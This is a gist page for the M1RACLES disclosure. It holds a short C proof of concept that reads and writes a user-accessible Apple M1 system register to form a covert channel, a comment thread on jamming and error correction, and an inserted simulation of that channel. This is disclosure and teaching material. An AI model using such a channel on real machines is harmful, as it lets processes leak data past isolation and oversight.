```c
/*
 * m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
 *
 * This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
 * It only builds and runs on arm64 Apple silicon, where that register is accessible from
 * user space.
 *
 * Please visit m1racles.com for more information.
 *
 * Licensed under the MIT license.
 */
#include <inttypes.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    uint64_t val;

    if (argc > 1) {
        /* Write mode: store the command-line value in the register.
         * strtoull keeps all 64 bits (atoi would truncate to int) and
         * base 0 also accepts 0x... hexadecimal input. */
        val = strtoull(argv[1], NULL, 0);
        asm volatile("msr s3_5_c15_c10_1, %x0" : : "r"(val));
    } else {
        /* Read mode: print whatever the register currently holds. */
        asm volatile("mrs %x0, s3_5_c15_c10_1" : "=r"(val));
        printf("%" PRIu64 "\n", val);
    }
    return 0;
}
```
Hi, why can't a third process just mess with the communication by writing garbage data to the register every time it gets a lock?
It can, but adding noise is not an effective mitigation against covert channel communications, as you can always use error correction.
I see, but at least it'll lower the data rate significantly, right? Thanks for the quick reply BTW. :)
Proportional to how much time you spend on it. If you peg a CPU core then you could halve the data rate of another CPU core trying to use the channel.
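The point made in the reply above, that a jamming process only costs the covert channel bandwidth rather than stopping it, is easy to see in a simulation. The following is an added example, not code from marcan's gist: the register is replaced by a plain global variable (assumption: only "last write wins" semantics matter), a third "jammer" process is modelled as getting scheduled between sender and receiver every third symbol and overwriting the register, and the sender uses a repetition code with majority voting as a stand-in for any error-correcting code. The jammer writes the complement of the sent bit, which is the worst case for the sender; random garbage would corrupt only about half of the jammed symbols.

```c
/*
 * Added example (not part of the M1RACLES gist): a user-space simulation of a
 * one-bit covert channel through a shared register, with a jamming third
 * process, showing that error correction defeats the jammer at the cost of
 * data rate.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated s3_5_c15_c10_1: in the real channel the sender's msr and the
 * receiver's mrs go to the CPU register; here all three "processes" share
 * this global. One bit is used per symbol. */
static uint64_t g_register;

/* The jammer gets the CPU once every JAM_PERIOD symbols, after the sender
 * has written and before the receiver has sampled (assumed schedule). */
#define JAM_PERIOD 3
static unsigned g_symbols_sent;

static void sender_write(unsigned bit)
{
    g_register = bit & 1;                 /* msr s3_5_c15_c10_1, bit */
    g_symbols_sent++;
    if (g_symbols_sent % JAM_PERIOD == 0)
        g_register ^= 1;                  /* jammer overwrites with the complement */
}

static unsigned receiver_read(void)
{
    return (unsigned)(g_register & 1);    /* mrs bit, s3_5_c15_c10_1 */
}

/* Send one byte MSB first, repeating every bit `reps` times (repetition code),
 * and decode it on the receiver side by majority vote over the `reps` samples.
 * Returns the byte as the receiver decoded it. */
static uint8_t transmit_byte(uint8_t byte, unsigned reps)
{
    uint8_t out = 0;
    for (int i = 7; i >= 0; i--) {
        unsigned bit = (byte >> i) & 1;
        unsigned ones = 0;
        for (unsigned r = 0; r < reps; r++) {
            sender_write(bit);
            ones += receiver_read();
        }
        unsigned decoded = (2 * ones > reps) ? 1 : 0;   /* majority of reps */
        out = (uint8_t)((out << 1) | decoded);
    }
    return out;
}

/* Send a NUL-terminated string through the jammed channel and return how many
 * bytes the receiver got wrong. Data rate is 1/reps bit per symbol. */
static unsigned roundtrip_errors(const char *msg, unsigned reps)
{
    unsigned errors = 0;
    g_symbols_sent = 0;                   /* fresh schedule for each run */
    for (size_t i = 0; i < strlen(msg); i++)
        if (transmit_byte((uint8_t)msg[i], reps) != (uint8_t)msg[i])
            errors++;
    return errors;
}

int main(void)
{
    const char *msg = "M1RACLES";         /* constructed sample payload */
    size_t len = strlen(msg);
    for (unsigned reps = 1; reps <= 7; reps += 2) {
        unsigned bad = roundtrip_errors(msg, reps);
        printf("reps=%u (rate 1/%u bit per symbol): %u of %zu bytes corrupted\n",
               reps, reps, bad, len);
    }
    return 0;
}
```

With `reps=1` every byte arrives corrupted, because any run of eight symbols contains at least two jammed ones. With `reps=3` or more, any window of `reps` consecutive symbols contains fewer jammed samples than clean ones, so majority voting always recovers the bit: the jammer has reduced the rate by a factor of three and stopped nothing. A jammer that runs more often forces a longer code, exactly the "proportional to how much time you spend on it" trade-off described above.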
are "msr" and "mrs" supposed to be different? Looking at the code, it seems there is a mistake there. (I don't know ARM assembly)
Yes, they are.
https://developer.arm.com/documentation/dui0802/a/A64-General-Instructions/MSR--register-
https://developer.arm.com/documentation/dui0802/a/A64-General-Instructions/MRS
Got it. Thanks!